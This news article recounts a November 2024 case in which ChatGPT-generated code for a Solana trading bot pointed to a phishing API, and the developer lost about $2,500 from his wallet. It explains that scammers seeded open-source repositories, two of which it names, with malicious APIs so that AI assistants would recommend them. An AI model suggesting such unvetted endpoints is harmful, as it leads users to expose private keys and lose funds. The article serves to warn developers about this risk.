Artificial intelligence has revolutionized the way we code and innovate, with tools like ChatGPT making programming more accessible than ever. Yet, as AI systems become embedded in our workflows, they bring significant risks. Over-reliance on machine-generated recommendations—known as automation bias—can lead to serious consequences, as one blockchain developer recently discovered.
Phishing-Losses instead of Trading Gains
A developer, known online as “R_ocky.eth,” sought ChatGPT’s assistance in creating a trading bot for pump.fun, a decentralized platform for meme token creation and trading.
Pump.fun, launched in 2024, leverages Solana, a blockchain network known for its scalability and low transaction fees. The platform simplifies token creation with features like bonding curve pricing, where token values rise with demand, encouraging early adoption.
Seeking help to streamline the coding process, Rocky turned to ChatGPT. The AI-generated code included an API recommendation, which Rocky believed to be legitimate. However, the API was a phishing tool designed to mimic Solana’s interfaces. By interacting with the malicious API, Rocky unknowingly exposed his private wallet key. Within 30 minutes, $2,500 worth of cryptocurrency was siphoned off.
Be careful with information from @OpenAI ! Today I was trying to write a bump bot for https://t.co/cIAVsMwwFk and asked @ChatGPTapp to help me with the code. I got what I asked but I didn’t expect that chatGPT would recommend me a scam @solana API website. I lost around $2.5k 🧵 pic.twitter.com/HGfGrwo3ir
— r_ocky.eth 🍌 (@r_cky0) November 21, 2024
Understanding the Attack
The fraudulent API functioned by redirecting calls to a phishing site disguised as a legitimate Solana endpoint. This tactic exploited trust in the seamlessness of AI-generated code.
Scam Sniffer, a Web3 security group, revealed that malicious actors had seeded open-source repositories with compromised APIs, increasing the likelihood of these being surfaced in AI-generated suggestions. These repositories relied on AI’s inability to distinguish between trustworthy and harmful resources.
🕵️ Found malicious repos:
• solanaapisdev/moonshot-trading-bot
• solanaapisdev/pumpfun-api
Purpose: Steal private keys via AI-generated codehttps://t.co/zhKXIlZIcL pic.twitter.com/NKQgcIAKVu— Scam Sniffer | Web3 Anti-Scam (@realScamSniffer) November 22, 2024
The scammer’s wallet, active since December 2023, recorded over 206,000 transactions and held $258,000 in stolen assets, including $147,211 in USD Coin (USDC). This high volume reflects a well-organized phishing operation targeting crypto developers at scale.
Don´t Trust AI Generated Code Blindly
There are clear lessons to be learned for developers and the industry at large. Verifying the authenticity of APIs and libraries through trusted sources is essential, as is the use of test wallets instead of primary accounts for development purposes.
Developers should avoid embedding sensitive credentials, such as private keys, in code or API calls. Beyond individual practices, the incident highlights the need for collaboration between AI providers, blockchain platforms, and cybersecurity experts to create a safer ecosystem.
The story of Rocky’s $2,500 loss is more than a cautionary tale for developers; it is a reflection of the broader challenges at the intersection of AI, blockchain, and cybersecurity. As these technologies continue to evolve, the balance between innovation and security becomes ever more precarious.
For developers, the key takeaway is clear: treat AI-generated outputs as starting points, not definitive answers. For the industry, fostering a culture of caution, accountability, and education will be critical in addressing the vulnerabilities exposed by this incident.